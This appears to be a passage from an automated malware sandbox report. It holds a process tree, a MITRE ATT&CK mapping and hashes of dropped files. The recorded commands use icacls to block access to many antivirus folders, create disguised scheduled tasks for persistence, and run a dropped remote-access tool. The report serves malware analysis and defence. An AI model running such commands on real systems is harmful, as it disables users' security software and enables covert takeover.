  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4636
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:3668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2984
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:1312
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4572
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4884
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2600
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:2076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:2360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4636
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2776
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4168
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:4612
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:3464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:2040
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4696
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:1788
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:3336
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4168
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:3112
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2156
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1224
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2464
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5836
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5620
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5760
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5972
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:2420
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3236
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:3464
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3648
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4936
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4788
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:996

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:2628

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4828

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2388

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
PID:480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:3424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:5724

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x000000000000049C 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
1⤵
PID:1908

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2300
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2088
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1384
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:5688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
1⤵
PID:4788
- C:\ProgramData\RealtekHD\taskhostw.exe
  C:\ProgramData\RealtekHD\taskhostw.exe
  2⤵
  PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
1⤵
PID:5760
- C:\ProgramData\RealtekHD\taskhostw.exe
  C:\ProgramData\RealtekHD\taskhostw.exe
  2⤵
  PID:4812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

Filesize
3KB

MD5
f9fd82b572ef4ce41a3d1075acc52d22

SHA1
fdded5eef95391be440cc15f84ded0480c0141e3

SHA256
5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

SHA512
17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
e5f3655796637b7d0f4a8ed402e119ea

SHA1
3baaf516676664d46727759914745776a166016a

SHA256
22d91a4321390a9445110f04d5600f49f03604a2d7ecadd10c663248295c88dd

SHA512
2125899d678c926c9f85ad81892f8ee91aa0a74e4c533bcb6e48675ebf0eccbe0db17998f3e3ab961cf3beb8fef7f950588398c5868327aa2d33f81bde797ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
62f068228394b57ba8d5c1a2d1468169

SHA1
8e2425fec8570145bde29fd2dc804fe8d1c49528

SHA256
4760b1a1e9c59e7c9d088d07505a53e91dd90db208ff160f68b42bd6d2d80da1

SHA512
4fe800fcedf7422de217dee3777b2651c1902b457ea423f74a860142177d685d299bf0347527bf7fe63576dfc3cde1bdf0fb29ac8e5a7e5d9b47bf78134a67d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
37414e050590e31e563e8c8e754daa40

SHA1
57be51340c5df30e0987f1e4ca8e1fbb297dff89

SHA256
29ede93db4ac17c9ee7b1e1d83c754d87a840392e4053e197f2dcc523b2106a9

SHA512
c7ebc6c0a468cc4414079c401af38e326a864b7bb38d2c3b177eb0766f841bc2b5ef22eb4c96b8c1e643886b03636ce313e4107be83d97d756cbe0452416480c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
dfc653bd544213566a1b18d5133073ee

SHA1
27e9e9b41acb9fa41eb06e3a0fadfbd8f1f93d51

SHA256
9063bf07e4c621ca4bc6c0094d82b9806c6801171afed0d49dbf38f66f74a51e

SHA512
583212375c8f79d1e96b0d211cf1c7ba8c853cbade0c1b9c4f2e658e02bb544e945d91be77c8b48f21ffd99f723c2288fd4fdfb1f63b0bd3bf1ab1bc9eb420fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

Filesize
334B

MD5
36205652dd8492479ca9176a585ad6cc

SHA1
df9944de759924e9a9089b331e3881a3312bc077

SHA256
62e418912ef4ffa881f14b7fadb42534e4cc5dc59ab493dad2cb387b441c7d42

SHA512
3b5a91ddd50067e33d0270b00b9ae4b20832df5a6e22c35da2864da8179837f6efc4597b39e9e2772209f57788af57fdfd70dd46801ae1a5fe76e3b0204cdab7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
962181da79ebf0eb8b5091433a430371

SHA1
92ab3d00c7e3509cae0ce85183d579b705bb76cd

SHA256
23912e46aca97f40f3b75c65b3c0c72a8ba711bb667eef257a8b4da9da6c0072

SHA512
904dbbbaadc8b89e88c5650d289a6b50ab8a6bb40f869da5aeff2da8dae74a6d7b72651de62876e8587f6d2bb4bec0286dc6beb957aeef34885403ed0d208145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

Filesize
520KB

MD5
1053386119c52075093771b8c2359fed

SHA1
40d27f1323c76109335145297e8e9c393366e858

SHA256
342a48bfda7d34e5ee86a14aca7e64866c1da84c4633ca2bfb1323047760258e

SHA512
236633996e1ff3de87248ba01a2980d578ac33dba8290df9cc4f82667dc8ab775d18c5eef9b1526a3a34205df7baf858f837076b633fa9f9d5482ded052cca52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
f41dbc0d3769a2ce42f9579e6442341a

SHA1
26421bd247cab4480a23324276d90966cf1e1728

SHA256
53e984a427440e69c7ee2db27a19a3ecc738be43aede6fc423a2e7d2a36b04e2

SHA512
0e621f88d869d2e3263be7ea638cc8a8575b18cbf85ce50070fac134ebf9a0a879dd126a55b7c8477c0d6791377830590f8193e68d10cc13df288d857ef58adf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

Filesize
12.0MB

MD5
942ae9896dbbf2df55c4eabef2ba1a97

SHA1
3fdc76ac97f2f5a760e98190fe5fb9cf6680187e

SHA256
c58b837d4c01611e837a55d9c0ef0bfaaeb3f7b357e6a0ece31b63f3450b5fe8

SHA512
6ef9d7bb160fb22ea63c4b6b4502462add4abc1df0be072dc49804507ad6e367b505e7e12b7261b2f5ca2af62f78cec33cc4ef915112431e2662a085934e767f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000062

Filesize
47KB

MD5
e83eb095e3fb244c06301eb74e50e7ba

SHA1
49af31dd5be295e1afa45639979b59936c368f2e

SHA256
b412b530247eaf0fc0bb8fceedb96ed2ac7f4119364dd7bfcd424a23aca51fd1

SHA512
d46791e116345c07733262666af82be872361e0ad2ff8c5a7c85629b91d89c2f9e9a405751b69ea9621f7e287b12881ed64c2bea7f24dc88fb44330ded1e4938

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000063

Filesize
36KB

MD5
2661bff6dabf18be9bcd62fc612912d2

SHA1
6e90a28a20d59b0383f87355b39f05254bfaff20

SHA256
d8be88da29a93137d4e69bdb3b486f9b48ffd789a4e54bc0200acd8decb1a6ae

SHA512
f210e2c8e29ec830fd6d46e60bf714abc224c5d1465a75395060fa6cecdf4d9b627c1208c40ef4c39e52cc1697c38f22c8f1882b30b3daf7eb4602dfe06efc69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000064

Filesize
38KB

MD5
b8103746b4757c6332fe545f11de8f70

SHA1
588965d6333eb015af39c7f44ce71dfac67fb0f7

SHA256
4177d563a186175d3a67091c399db6c57fc271e202406e244d4bc8ad95b1aebd

SHA512
c83bd52d674d90752dfffeb76971a4f9684054d6f02cfdbe8f336758ac46d8b430f306cc64be00112b8c38d191afd1b8395d58600b12cefcb6a052ab70214ebf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000065

Filesize
21KB

MD5
ec0963f084571ccba8609e51d71bf6ec

SHA1
b4a93e1b2e235488747b17c212ae14e5551c2db9

SHA256
39041d7cca3821b6b33037d88740780d6c1b380cf4973f7a869b101d35b015c3

SHA512
88689aab98763297eb045308d3a1c415bcb0dcb58dc5d3f4338e5c92018666a0b0c5bc2cc444ffe333c4b6ea54f0286a4c6310a9e18d418fba83ff2698be5525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000066

Filesize
21KB

MD5
6bf0a11d94eea9f5dbb2e3878d26a2e2

SHA1
591206d03341c1083843a43d6774f66b6b9f171e

SHA256
ed3e1c41b0dfcfa1f28020accd8442e28df7ad1ce6f497eb0d070e2b89e16892

SHA512
00c277d60f835895069005f594e93ade91b2152c7a6f6f9f3b15916a3bf7a10f15f60b8f0f212930aee7fb86888625cce14f0bd4d8801fa3591423afa2103d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000067

Filesize
82KB

MD5
8b36b954e5a8947dedbc720664fbccb7

SHA1
0310a60a8bbd7ac385b6e94aec8dee9aa05a6d24

SHA256
069b3e224154172e3c385b5ebbdde887253d596776b74b9fb2a326b875fb718e

SHA512
c2827251585fbb5e24bc38ef58822e8892d952c6e2a90743453502254550384cfcc9789858d66706c86f51c483fc28c23c796ba6285747689940460402b30f29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000068

Filesize
66KB

MD5
9ca6ec3fcb21c629fb7a42a9afe7bda1

SHA1
5f2a721cc1b008e6bd02efa6ee8db92161f080c4

SHA256
a98de38a42dba528e148a5934f09cf786212c948b8cd54b54bdec31d93f2318c

SHA512
34fdf73c17b114219e4544389ab05793cdcb1551e3b6b547935169108fb8a08acfb3dcf1483770542ef97bb93d4689af1cc198bf2a0832da061b6aa5930feb6e

Download Submit
